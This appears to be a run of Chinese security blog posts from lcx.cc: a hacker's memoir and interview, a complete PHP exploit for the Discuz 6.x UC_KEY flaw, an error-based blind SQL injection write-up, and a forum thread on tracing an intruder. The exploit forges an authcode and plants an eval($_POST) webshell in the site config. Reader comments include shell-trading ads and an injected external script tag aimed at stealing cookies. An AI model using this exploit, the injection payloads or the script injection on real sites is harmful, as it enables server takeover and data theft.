然后白天就在学校偷偷翻杂志,把一些重要的知识点写在笔记本上,死记硬背书里的 cmd 命令,放学、放假去网吧实践…… 每周的书刊都翻了又翻,里边做满了笔记,翻完杂志又去逛杂志官网论坛,自己没有电脑读取附带的光盘内容,就去下载别人发布的光盘镜像,玩那些软件玩的不亦乐乎,书籍一直保留到现在也没舍得卖。 一直买了一两年,直到后来觉得书里的内容太菜了,就再也没买了,后来互联网媒体时代到来,对传统纸质媒体产生冲击,这些书刊有些只出电子版了,大部分直接绝刊倒闭了! 这些书刊对当时的我影响很大,知识在一两年之中突飞猛进,渐渐地在当地小有名气,还收了好几个徒弟,入侵过本地几乎所有网吧,然后这些网吧老板、网管都认得我了,去上网都跟防贼似的看着,当然,也有些最后混成了朋友…… 岁月匆匆,一晃眼,已步入了高二的学堂…… 这一年,发生了许多事,家里的变故,再加上也没有钱继续交学费,于是就彻底告别了学生生涯,十几岁的我匆匆步入社会,开始赚钱养家…… 没有任何社会经验,也没有任何工作能力,一个十几岁的未成年穷屌丝学生能干啥? 最初的几个月都在网吧包夜度过,做着黑产大牛一夜暴富的梦,混时度日,对未来一片渺茫…… 数月后,在别人的介绍下,在某网吧开始当网管,一个月工资只有五百多,很低很低,只够吃饱饭,但是每天可以长时间免费上网,这令我很开心,毕竟当时网费还是很贵的…… 于是,在这个嘈杂、肮脏、混乱不堪的环境中,度过了我人生中很重要的一段学习时光…… 以前对硬件一窍不通,现在天天修机维护,造就了我对硬件的精通,各种疑难杂症手到病除,积累了丰富的底层硬件知识。 这是我黑客生涯最活跃、最巅峰的一段时间,白天端茶泡面、搽桌扫地、修机维护,见识社会各色人等,晚上通宵奋战,横行于各大黑客论坛之中…… 也就是在这时结识了蹒跚学步的 t00ls、吾爱破解、看雪、绿色兵团,以及各类杂七杂八的技术论坛,什么黑客动画吧、黑客基地、黑鹰、Dir溢出的红客联盟,只要是个黑客技术网站,就都有我的足迹,甚至还开了个网站叫“巅峰黑客”(现在看起来,真他丫的SB!-_-!!!)! 凭着过硬的技术、雄厚的实力,在 oldjun(老君)的邀请下,混进了 t00ls 核心圈子,还当上了版主,后来因为年轻气盛和某核心成员吵架,又被赶出核心圈,至今保留一个荣誉会员称号…… 那个时期,编写、发布过很多软件,可能有人还记得在 t00ls 发布的“全球首款B/S构架远控 Network Rat v8.0”,没错,那个是在网吧连续通宵三五天写出来的!但现在看起来,就像是个玩具…… 在网吧的学习生涯,每天都像打了鸡血,知识面涉猎之广,连现在的我都感到恐怖,同时也赋予了我极其丰富的各类知识。 就这样,没日没夜丧心病狂的活着…… 时间一晃,一半年过去了,随着在黑客圈知名度的增加,以及技术实力的增强,手里也渐渐地攒了一些钱,终于凑够钱买了人生第一台电脑!某款杂牌机!!! 之后就很少去网吧了,而是蜷缩在县城某个城中村出租屋的黑暗小角落里,用着自己新买的电脑潜心研究,脱去浮躁,慢慢向真正的技术大牛进化,足不出户,不知世上是何年…… 花开花落,果生果熟,叶出叶红,叶凋雪落,又一年过去了…… 在这期间丰富了更多新的知识,建立了个人小站:https://lcx.cc/,一直运行到现在,同时也见证了乌云的崛起。 后来,机缘巧合,认识了一些公司老总,在贵人大力邀请之下,告别蜷缩了几载的小小出租屋,正式进入搬砖生涯…… 再后来,这些年,一直走南闯北,手里也渐渐的有了些积蓄,生活也更舒适一点了…… 然后,然后就没有了…… (完) (注:以上内容纯属虚构,如有雷同,绝无可能!) ---------- 写在最后: 正是因为对自己变态的要求,才造就了自己的现在,做!就要做第一! 我们现在还很年轻,人生的轨迹,也才刚刚开始。 这个世界,从来就没有什么公正、平等! 既然没有含着金汤勺出生,就更要付出常人千倍、万倍的努力! 在自己的道路上,谱写自己的传奇! 【1】自己的故事: 1.基本信息,做过那些牛掰的事儿?感觉最有成就感的一件事是什么? 牛掰的事情嘛,干过挺多的(lcx.cc 上有很多相关文章),最有成就感嘛,那当然是创立 https://lcx.cc/ 。 2.网名是怎么来的?核总这头像啥意识?用了这么多年,有什么寓意? 其实我最早网名不叫“Nuclear'Atk(核攻击)”,而是“Hacker'Rose”,后来和 t00ls 核心吵架,那个号封了,然后新注册了一个,想着起个牛逼独特的网名,正巧看到百度新闻“…核攻击…”,就用了…… 后来也没改过,就用了这么多年,至于寓意,在博客也说过(https://lcx.cc/post/1/),其实很简单,引用原文: ********** 英文:Nuclear'Atk 中文:核攻击 英文网名拆开的意思是: Nuclear:英语单词,1. 核,核子,核能,2. 核心的,中心的,3. 原子核的,原子能的,原子弹的。 ':半角单引号,用来判断注入的经典符号,这里用来做连接符、分割符。 Atk:英语单词 Attack 的缩写,意思为:1. 进攻,袭击,2. 攻击,打击,攻,攻打,3. 抨击,责难 有时当某些网站禁止使用单引号的时候,还用过:NuclearAtk、Nuclear-Atk、Nuclear_Atk 等昵称。 2010 年以前用的网名为:HackerRose,带“er”的,不是“HackRose”。 ********** 头像取自十几年前的一部电影《地心毁灭》,电影末尾老鼠黑客(Rat)开发的一款软件中的logo,截图提取出来,再配上电影《黑客帝国3》的壁纸作为背景,就成了现在的头像。 有眼尖的朋友发现,头像中有两个单词“Network”、“Rat”,后来也被我作为一款远控的名字了(见自述)。 黑客帝国3 影视壁纸,下载地址:https://lcx.cc/file/old/1762_黑客帝国3 影视壁纸.jpg 3.何时开始学习的黑客技术,因为什么喜欢上了黑客? 嗯,在自述里详细讲了,初中。 4.在学的过程中遇到过那些有趣,兴奋,激动的故事,有那些比较印象深刻的事情? 嗯,这个在自述里有详细说。 5.最开始学习技术的时候是通过什么样的方法学习的?现在呢? 嗯,这个在自述里有详细说。 6.渗透最久的站用了用了多长时间,最后怎么搞定的? 最久的,断断续续几个月吧,最后 DDOS 迫使其更换服务器,然后你懂得…… 7.当你感觉到瓶颈的时候你是怎么做的? 换个思路,绕出来,再从另一入口进,山穷水尽疑无路,柳暗花明又一村~ 8.在那些论坛组织学习过?写过那些黑客工具? 噢噢,这个太多了,自述里详细写过一部分,工具嘛,更多了,具体参考 https://lcx.cc/。 9.在没发家致富的时候是怎么平衡现实需求和技术追求的?是否有时间不够用的情况? 参考自述内容…… 10.家长对你学习黑客技术持有什么样的态度?亲朋好友之间有学习黑客技术的吗? 因为对这个并不懂,但作为一门技术来说,持支持态度。 部分好友有学习。 11.还有什么其他的兴趣爱好吗?业余时间做什么?在黑客领域之外,还关注那些领域的知识? 兴趣爱好很多,音乐、游戏、电影、摄影、写作等……关注的领域也很多,主要是科技之类的。 12.谈谈大家很关心的避免水表的经验,如何保护自己? 这个问题面太广,完全可以独立写一本书,简单的说的话,把真实身份和虚拟身份隔离使用。 更多保护自己的知识可以参考:https://lcx.cc/ 【2】核攻击的生存现状 1.核总现在结婚了吗?孩子几岁了?爱人是做什么的呢? 结婚嘛,现在太年轻,太早!女友嘛,这是个奢侈品,不敢拥有~ 2.觉得做WEB的10后挣钱方向是啥? 这个不敢妄下评论,我感觉应该是移动端吧。 3.现在的状况是什么样的?未来的打算是什么样的? 现在状况么?在某食品行业搬砖! 未来打算么?谱写自己的传奇!-_-!!! 4.核总技术做了多久?现在做的是技术还是管理? 网络安全经验,大概有十年了。 现在技术管理都做,以后可能转型为管理吧。 【3】对当前网络、信息安全的看法 1.网络安全事故频发,你如何看? 任何行业都有安全事故,控制在安全的度里即可。 网络安全近几年由于媒体热炒,再加上技术广泛化,就暴露很多问题了,等过了这个时期,全民安全水平提高,就不会有那么多安全问题了。 2.对现在的国内安全现状和未来的趋势有什么见解? 国内安全现状嘛,个人感觉很混乱,毕竟是一个新兴的行业,还没有发展出自己的规则。未来应该会整合、规则化。 3.国内外的企业应该怎么样避免这些事件的再次发生? 对企业接触不多,不敢妄下评论。但肯定要学习经验、亡羊补牢。 4.对黑产和白帽子的看法是什么? 两者本质没有区别,都是靠技术生存,只是途径不一样。 5.您能否从自己的角度说下现今国内黑产现状与模式以及未来的发展趋势? 这个问题太大,就我个人观点,现在国家政策等原因,未来小鱼小虾会消失,只留下大玩家继续玩,手段也会更隐蔽,但永远都不会消失。 6.有人说黑客圈技术环境变了,在你看来之前的环境是怎么样的,现在的环境是怎么样的? 改变是肯定的,前几年行业新兴,泡沫太大,普遍浮躁,现在泡沫基本消散了,也都静下心了。 7.健康的技术环境应该是怎么样的? 那要看你如何定义“健康”了。 8.黑客需要一个什么样的环境?国家,企业,社会,媒体,个人应该怎么做? 嗯,无限零食供应,超高配置设备,舒适的工作环境,几个极品妹纸助手,嗯,一定是这样的环境! 国家,出台政策,使它逐渐正规化,像过渡到白帽子一样,合法的研究技术。 企业,正视自身网络安全问题,加强自身防范,而不是单方面指责黑客行为。 媒体,合理引导社会舆论。 个人,转职…… 9.在安全行业百家争鸣的时代,核总最看好的是哪个方向呢?大数据安全分析?威胁情报?可视化安全?or等等。核总怎么看? 每个方向都各有所长、各有优缺,不能进行简单比较。 我觉得未来大数据分析预测,应该是主流方向。 这里说的不是这些企业搞得那些“概念大数据”,而是将整个社会各行各业数据进行整合分析,虚拟一个世界运行,预测未来发生的事,就像《美国队长》中的洞察计划、《少数派报告》一样,预测犯罪、事故、灾难的发生,并将其消灭在萌芽中,这是很有价值也是很恐怖的一件事。 咳!扯远了…… 10.关于信息安全这个行业,核总毕竟也是行业大佬了,眼光肯定很独到,就近几年来看,安全产业发展得也算挺红火,市场需求量也在逐渐增加,政府和大众的重视程度也在提升,这是否就意味着安全行业的未来发展形势会很好,不会受到传说中的互联网寒冬的影响? 这个问题很难回答,我等屌丝也无法预测这类问题。 安全行业是基于企业安全需求的,企业有需求就不会有寒冬,安全行业是个新兴行业,还在发展中,很难预料。 【4】对将要踏入信息安全行业的新朋友们提一些建议 1.针对现今网络安全人士,会点渗透,刚大学毕业,开口就要15-40k月薪的看法。小伙伴们毕业没多久,经验不足。但是开口就是几十几十k的要,真敢开口啊。互联网安全行业现在就是泡沫行业吗? 有一天会突然一下的 破了吗?那些没有CISSP,CISP,CISA,Security+ 等等的人,没工作过,以前都是玩CTF长大的孩子们,他们哪里来的勇气?就敢狮子大开口?希望核总发表下核心建议。我们这年头,做安全行业的招聘也好难啊。 无论哪个行业,都不缺刚毕业狮子大开口的愣头青。 很少在安全公司混,这个我没有发言权,就不瞎指点了。 嗯,我也没有那些证。亲,我高中都没毕业,贵公司要吗? 2.渗透工程师行业将来的前景如何?核总能否就渗透相关的职业发表些看法。比如做安全服务(乙方)的,做某产的,成为某家公司的安全团队做维护该公司安全问题(算安全运维了?)的,以及为政府效力做境外目标的。就渗透而言,表弟见识短浅,觉得基本也就这几个职业了(求指点)?然后这些职业分别的优劣在哪些地方? 没在乙方待过,听乙方朋友们说,貌似都很累、甲方都很操蛋,想打人,俩字:蛋疼。 某产么,靠实力吃饭,金子满地有,看你有没有本事活着带出来。现在政策越来越严,估计死的人更多了吧。行业整体呈现龟缩状态,将面临新一轮的洗牌。 安全运维么,没待过,感觉相对乙方应该轻松点,据说是祖传背锅的。 国家队,也没待过,涉密单位,进去的朋友再也没出来过,人间蒸发了,嘘~ 3.觉得渗透火候差不多了,想要接着提升安全技术,避免不走弯路的路该怎么走呢(下一阶段学啥最靠谱)? 学着如何防御被渗透,将会接触更多知识面,碰到更复杂困难的问题。 4.荐一些性价比高或者值得拥有的技术方面的书吧,越多越好哈哈。以及核总涉猎的方面的内容简单说一下,对于技术应该怎么学习? 这些年基本没看书,有问题直接百度、谷歌,所以不知如何推荐。 学习技术,面很广,我感觉,挑自己感兴趣的方向入手即可,兴趣是学习的动力! 5.有时候会不会觉得搞安全是一个坑?刚开始学习安全需要实践,但是现实是没有什么好的测试环境供大家实践,只有到处找SQL注入点,到处找XSS点,各种洞,各种点,以求技术上有所突破,但这样有可能会惹上官司,搞不好还要进去蹲上两年,安全处处充满坑,请问核总如何看待? 嗯,所以我转职做食品行业了…… -_-!!! 【5】朋友眼中的核攻击 这个看文章发布后的评论就知道了…… 摘录部分: depycode:核总为人很稳重,很有大哥气质。技术很扎实,涉猎广泛深入。从他博客学到很多东西,很感谢核总。 耶稣:喜欢研究东西,,非常低调,知识非常的全面,在他的博客上面学习到了不少的经验,都是他认真思考后发的,可以学到很多。 lmy:核大大是一个很有趣的胖子,身边美女众多……此处省略一万字,重点是软硬都精,软到分分钟来场核风暴,硬到分分钟让你车熄火…借此也感谢核大大帮兄弟解决不少头疼问题… cond0r:性格比较严肃,不容易接近,但是在技术方面很有钻研精神,有什么问题总要研究出一个所以然来,也乐意分享。 T00ls.Net 评论:https://www.t00ls.net/thread-32390-1-1.html FreeBuf.COM 评论:http://www.freebuf.com/news/89379.html 留言评论(旧系统): 失名 @ 2015-12-14 18:47:04 看到核总的专访了,特地发来贺电 ╮(╯▽╰)╭ 本站回复: 感谢!感谢!!! 佚名 @ 2015-12-16 16:13:09 核总威武,以核总为方向,努力ing... 本站回复: 加油! 0xLucifer @ 2015-12-16 16:44:30 0xLucifer发来贺电! 本站回复: 感谢! delectate @ 2015-12-16 19:59:50 《黑X》早就没了,《黑防》最早还分两册,现在也停刊了貌似(电子版也不出了),纸质版只收藏到2010-06。 这条路,不好走。 本站回复: 是滴 +1 佚名 @ 2015-12-17 12:04:27 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 本站回复: -_-!!! Unicorn @ 2015-12-17 18:54:35 正是因为对自己变态的要求,才造就了自己的现在,做!就要做第一! 我们现在还很年轻,人生的轨迹,也才刚刚开始。 这个世界,从来就没有什么公正、平等! 既然没有含着金汤勺出生,就更要付出常人千倍、万倍的努力! 在自己的道路上,谱写自己的传奇! --这段话振聋发聩! 前辈,学习了! 本站回复: good good study, day day up! 佚名 @ 2015-12-18 17:09:51 核总威武,我以为你自己给自己做的专访呢。。。 本站回复: -_-!!! ayiis @ 2015-12-18 21:53:32 核总,核大,蛋大,JB大,haha 本站回复: 同大、同大!-_-!!! Joyce @ 2015-12-18 21:54:59 核总威武 本站回复: 感谢! 佚名 @ 2015-12-22 16:05:44 看了核总的经历好励志!祝核总早日结婚,早生贵子!!!!!!!!!!!!!!!!!!!!!!!!!! 本站回复: 感谢支持! 佚名 @ 2015-12-22 19:19:59 请在这里填写留言内容,最长不超过 1000 字。 本站回复: [暂无回复] Sany @ 2015-12-22 23:52:54 坚持就是胜利,谢谢分享经历。 本站回复: 感谢! 佚名 @ 2015-12-26 11:20:27 贺电贺电,就差你被神化了 本站回复: -_-!!! NEUIN @ 2015-12-31 00:34:51 同在荣誉会员群,当时测试过你那网吧写的远程软件,你啥时候把我删了。 本站回复: QQ人太多,定期清理。 lotion @ 2016-01-02 10:07:27 我们特别像啊~~~~ 本站回复: 与君共勉! wormfox @ 2016-01-03 19:17:24 很多相同的经历! 本站回复: 与君共勉! 哈哈 @ 2016-01-04 23:07:10 跟核总有过一些相似的经历,我几年前就转行了,转玩金融了.......但还是默默关注安全这行业。。。。。。。。。。 本站回复: 哈哈哈,你转行的早!!与君共勉! 烟头 @ 2016-01-10 21:52:51 网吧一样的经历,验证码很操蛋你知道么 本站回复: -_-!!! 拉拉 @ 2016-01-16 20:33:21 哈哈哈哈哈两个无关紧要的问题 1、课桌上的初中《信息技术》已快被翻烂,里边写满了各种笔记以及自己的心得体会,还在空白处手算二进制、八进制、十进制、十六进制,估计全校就我一个这么干吧,其他人都撕了折飞机…… 现在看来没什么 但当时同学有没有觉得你很装之类的啊。 2、从此一发不可收拾,什么《黑客X档案》、《黑客防线》、《黑客手册》、《大众电脑》之类的每周必买,当时只有一个报刊亭卖,每次还只有两三本,去迟了就没了! 有没有知道买这些书其他几个人去干什么了 本站回复: 1、想己所想,做己所做;旁人想法,不曾注意。 2、城镇很小,高手寥寥,想必都拿去擦屁股了…… CoreFish @ 2016-01-30 10:39:49 有着一段与何总相仿却还没书写完整的经历,之所以这么说是因为现正处于核总用VB编写“Hello World”的年龄,却有着核总许多的后续经历,看完文章激励人心,希望能往核总的方向发展吧。 本站回复: 与君共勉! CoreFish @ 2016-02-01 11:54:00 心无所妄,心落于实,想己所想,做己所做,如其所是,非己所想,不忘初心,方得终始。 本站回复: 大师! 尼古拉斯赵四 @ 2016-02-01 18:41:41 我点一个赞,给99分,一分用666的形式给楼主,避免楼主傲娇以后不更新博客。 本站回复: 你赢了! -_-!!! 小成 @ 2016-02-25 14:21:33 小成致核电,哈哈哈,觉得差不多的人,这不是你们特么高中辍学的理由。我不是针对谁,我只想说,在座的各位。。。 本站回复: -_-!!! 某站长 @ 2016-03-03 23:12:06 哎,当年拿着自己的红包钱去买了5块的虚拟主机然后搞了一个com域名 然后办了一个论坛,之后因为穷的问题关站。现在想起来当初的论坛真垃圾。 本站回复: -_-!!! 来自某大学的大二屌丝 @ 2016-03-07 18:13:16 小时候和你一样,很喜爱电脑 一年级接触,四年级时在机房百度查询了杀进程代码,还查询了注册表找到卸载密码,自己电脑上安上了教室客户端。。。。。各种关机。。。。后来可能我在家里生活得太安逸,木有像您这样坚持下去。。。。。。 本站回复: -_-!!! zdir @ 2016-03-07 21:41:48 挺励志,我不会放弃. 本站回复: 感谢支持!与君共勉! Monster @ 2016-03-07 21:46:40 核总,请问你当网管的时候,一天睡多少小时啊我擦,我现在跟核总的情况差不多,高中喜欢上了黑客技术,一直在坚持,真的非常着迷。我现在也在一家网吧也当网管,的确网吧的环境很难让人静下心来学习,,, 本站回复: 七八个小时吧~与君共勉! 佚名 @ 2016-03-15 23:13:06 核总已经2016年了,还没老婆和情人吗? 本站回复: 你猜~ Any3ite @ 2016-03-18 15:01:48 什么时候这个验证问题怎么还出现这 18、注销已登录用户的命令是? [换一个] [找答案] 介意添加点关于男人都懂的知识么? 本站回复: 你赢了…… -_-!!! 黑鸡 @ 2016-03-29 13:56:50 你好蛋疼 本站回复: 啊 Sovi @ 2016-04-26 00:56:13 核总,咱俩经历挺像的 本站回复: 与君共勉!

2015/12/16
articleCard.readMore

DZ6.x 的 UC_KEY getwebshell exploit

DZ6.x的UC_KEY getwebshell exploit L.N. (http://ln.sycsec.com/) | 2015-11-17 13:55 网上有dz 7.x和dz x系列的uc_key 利用方式,今天遇到了一个dz6.0的网站,于是分析了下代码,改了下利用程序,分享给需要的人。uc_key getshell 是一个影响比较广存在比较久的漏洞,基本上使用ucenter做用户中心的程序都可以使用,但需要根据特定程序写特定利用。最新版本的dz好像是修补了,没有具体看代码了。 ps:需要或者感觉不错的请挥挥你的小手 点击 “顶” 注意三个地方: 1.在dz6.x中对xml的解析是不一样的,所以需要修改利用exp $post = uc_unserialize(uc_post_contents()); $configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '$UC_API');", $configfile); <?php // 代码版权归原作者所有! $timestamp = time()+10*3600; $host="127.0.0.1"; $uc_key="Qfp1O0N3h5V356bbUdPer3958dp8X3b55dBa9fKai7s3Q7AbY9I3Hcnc7ec505sa"; $code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key)); $cmd1='<?xml version="1.0" encoding="ISO-8859-1"?> <root> <UC_API id="UC_API">http://xxx\');eval($_POST[DOM]);//</UC_API> </root>'; $html1 = send($cmd1); echo $html1; function send($cmd){ global $host,$code; $message = "POST /dz/api/uc.php?code=".$code." HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Referer: ".$host."\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: ".$host."\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key ? $key : UC_KEY); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } ?> [原文地址] 留言评论(旧系统): 佚名 @ 2015-12-01 15:14:40 学习了 本站回复: good good study, day day up~ 佚名 @ 2015-12-04 14:55:22 我想找个黑客做业务 业务量很大 有意向联系我 谢谢1343119337 本站回复: -_-!!! 佚名 @ 2015-12-12 12:54:49 寻找一名渗透的技术员,弄个小网站Q632523093 本站回复: 站长提示:网络广告有风险,注意辨别,谨防上当受骗!!! 佚名 @ 2016-01-11 15:01:01 up up 本站回复: -_-!!! Good @ 2016-01-23 21:27:20 This payload is Good. 本站回复: -_-!!! boom @ 2016-02-20 13:35:00 收SHELL 收SHENLL 收高权重SHELL 重要的事说3遍, 邮箱:1755961338@qq.com 本站回复: -_-!!! 佚名 @ 2016-05-21 15:20:51 长期出售SHELL,要的qq751845429 本站回复: 友情提示:网络广告有风险,注意辨别,谨防上当受骗!!!

2015/11/24
articleCard.readMore

一个基于报错的盲注场景

一个基于报错的盲注场景 MayIKissYou | 2015-11-06 16:17 1:背景 近日某壮汉给了我个链接 说有注入 但是过滤了一些关键字 导致数据有些出不来 让我帮忙看看 于是 我看他造爷 就研究了下 场景说明给大家,有兴趣的同学一起交流 不一定是好办法,目前为止想到的 可行的办法 2:场景 一个站点的登录框存在注入, 1):用户名存在,密码不存在 通过输入'号出来明显的报错信息 2):输入正确与错误的用户名都会返回 用户名或则密码错误 3):此处过滤了(select 基本上输入(sdadadsselectadsd也会被过滤[此处个人觉得是比较恶心的 过滤太严,而且出数据基本靠他了] 4):不想用时间盲注 怕把服务器给睡挂了 ps。测试的时候就没用线上环境了 自己在数据库的表里找了个实例测试了 3:想法 由于select被干的太狠了,因此想法就是要把管理员的账号密码弄到就好了。 但是现在比较惨的地方是直接用经典的报错语句 由于语句中有(select会直接被干掉的 于是此时就想由于当前就在user表里,直接通过username=‘admin’and password='xxx'的形式来猜解账号密码 1)起初用了updatexml()来进行报错 大致语法就是 select * from corp where corp_id =1 and updatexml(1,if(1=2,1,concat(0x5e,version())),1) ERROR 1105 (HY000): Only constant XPATH queries are supported 仅仅支持constant 然后我换了种 写法 select * from corp where corp_id =1 and if(1=1,1,updatexml(1,concat(0x5e,corp_id),1)) ERROR 1105 (HY000): Only constant XPATH queries are supported 这样一个基于报错的盲注的方法 我们直接去这么操作: 正确的时候返回为空 不正确的时候返回为报错。 于是我们可以使用corp_id=1 and corp_name= 'xxxx'的形式最后获取corp_name的值 按道理类似的使用uname = ‘admin’ and upass = 'xxx'的方式获取pass的值 ps. 但是这里得靠字典将pass的字段爆破出来 [原文地址] 各种吐槽: 1# Vigoss_Z (http://i-security.cc) | 2015-11-06 16:28 没看懂啊, pass也可以相同的办法, 36x16(32次)搞定?为什么需要字典? 2# MayIKissYou | 2015-11-06 16:30 @Vigoss_Z 啊 实际环境不知道 user表的password字段的名称的 = = 3# 紫霞仙子 | 2015-11-06 16:32 waf小王子,赞! 4# Vigoss_Z (http://i-security.cc) | 2015-11-06 16:37 @MayIKissYou 2333333 以为报错出来sql语句,知道user和pass字段了。 看脸了。 5# MayIKissYou | 2015-11-06 16:41 @Vigoss_Z = =主要是想说一下如何构造一个判断依据[盲注的条件] 之前没碰到过 嘿嘿 6# Manning (MSpider作者) | 2015-11-06 16:48 啥啊,给个链接一起玩啊!? 7# 我是壮丁 (专业打酱油) | 2015-11-06 18:28 waf小王子 留言评论(旧系统): *** @ 2015-11-11 11:27:34 ****** 你的好去处 http://www.***.com/***/ 本站回复: 恭喜你!已进入永久屏蔽名单! 知道我有多帅吗 @ 2015-12-13 20:30:10 牛逼 本站回复: -_-!!! 佚名 @ 2015-12-17 18:27:11 <script src=http://t.cn/R4LOLr3></script>您好<script src=http://t.cn/R4LOLr3></script><script src=http://t.cn/R4LOLr3></script> 本站回复: 收到 cookie 了么,孩纸~

2015/11/10
articleCard.readMore

讨论:网站遇黑阔,求分析思路查身份~逆向追踪黑客、溯源分析

网站遇黑阔,求分析思路查身份~ zone | 2015-11-03 00:04 朋友的一个刷单平台最近遇到一黑阔,损失了不少,找我帮忙,也没啥好主意,唉~_~ 各位大神快来给点建议分析分析~ “一个刷单平台网站,分为商家和刷手,刷手通过平台给商家做任务。10月份,就出现,黑客登录到刷手的账号,给商家做任务,是远程付款任务,就是商家在刷手的电脑进行付款,黑客以刷手的身份,让商家在自己电脑上付款,然后达成远程钓鱼的目的。付款的时候,直接伪造付款页面,将钱转走。后来,我在平台上规定,商家在和刷手接洽的时候,必须核对QQ,就是商家必须和刷手本人的QQ聊天,才能做任务,否则被骗不负责,后来骗子感觉骗不了了,就开始利用黑客技术,修改刷手会员信息的QQ账号,将QQ改成自己的,然后冒充刷手做任务。 这几天,通过调取10月份之前的会员QQ信息和10月份的QQ信息,进行比对,发现一些QQ号在10月份被修改过,今天把被改过QQ的这些刷手账号封了。以免黑客登录这些账号行骗。但是晚上,很意外的是,上午封的账号,黑客晚上竟然解封了,依旧照常到里面接任务行骗。 基本情况就是这样,现在黑客,能修改会员密码,能修改会员QQ号,还能将管理员封的账号解封。 ” 不知这位黑阔是只能上后台,还是已经拿下服务器了,朋友说安全狗没查出什么出来,上后台的话,如果有xss也许就能很轻易进去了。 现在的问题是,可不可以通过一些技术手段,找出这位黑阔的真实身份,让平台避免损失,求姿势~ (我想的是能不能在黑阔登陆的帐户上,做些手脚,比如插入一段<embed/src=//小号qq空间>,记录访客,查真实qq。。。)再社工。 已知:黑阔作案qq通常是小号,多次登陆ip显示为江苏徐州的。 ~~我怎么感觉有种侦探小说的赶脚。 [原文地址] 各种吐槽: 1# h3hz | 2015-11-03 01:05 还真是逗智逗勇啊,我怎么感觉黑阔有数据库权限,换个后台,改下数据库密码,找出黑阔怎么日进来的蛛丝马迹 2# 麦兜 (麦兜爱吃苹果) | 2015-11-03 01:25最佳答案 1,修改所有有解封权限用的密码,全部用明文加md5,看是否还有这样的情况,如果还有,说明漏洞不在用户密码,可能是xss或者sql 2,登录后台,前台,抓包,一个一个的验证,看是否有访问非正常url,如果有可能是xss 3,注入漏洞就只能看日志了,web日志,数据库日志 4,如果被拿了webshell也只能从日志分析了。D蹲可以扫一扫, 5,服务器端口漏洞,这个就要具体看了,关闭所有端口,只开放80对外访问,注意检测弱密码ftp,ssh.telnet,rdp,mysql,mssql,web(80,8080等) 6,看你是否有备份,优化维护后直接回复,记得开日志 3# 麦兜 (麦兜爱吃苹果) | 2015-11-03 01:27 你装了安全狗,有防注入,一般在检测sql注入的时候可能会被狗拦截,你可以对应安全狗的注入日志,对应的找 4# 围剿 (七月流火,八月未央,九月白露凝成轻霜) | 2015-11-03 08:06 @麦兜 666 5# 随风的风 (静,已修身) | 2015-11-03 08:14 @麦兜 666 专业啊 6# 纷纭 (:-)) | 2015-11-03 08:30 查看web 日志~~ 7# 齐迹 (sec.zhubajie.com 欢迎来撸) | 2015-11-03 08:53 万一是逻辑漏洞呢?任意密码重置在wooyun上已经不计其数了。 还有越权修改资料什么的。 这些在NB的软件都无法检查的。 8# 一只猿 (专注无线电与硬件安全) | 2015-11-03 09:02 搞个蜜罐 9# Hckmaple | 2015-11-03 09:09 @麦兜 分析透彻!666 10# 大漠長河 (专注智能家居与硬件防火墙) | 2015-11-03 09:11 @一只猿 高论 11#感谢(1) newline | 2015-11-03 09:21 第一时间下线应用, 如果是VPS, 把VPS系统加应用打包刻到盘或者转移到移动硬盘, 挪到一个断网环境,先审计一遍日志, find查找触点信息, 比如shell, sqlinjection, xss类的问题触点, 如果可以找到, 就去复现, 可以复现的话就对其进行修复然后继续下一步审计, 如果找不到, 就应该从客户端边界开始审计, 检查客户端边界用户可控变量,可控参数, 是否存在变量型的注入, 保存型&反射xss? 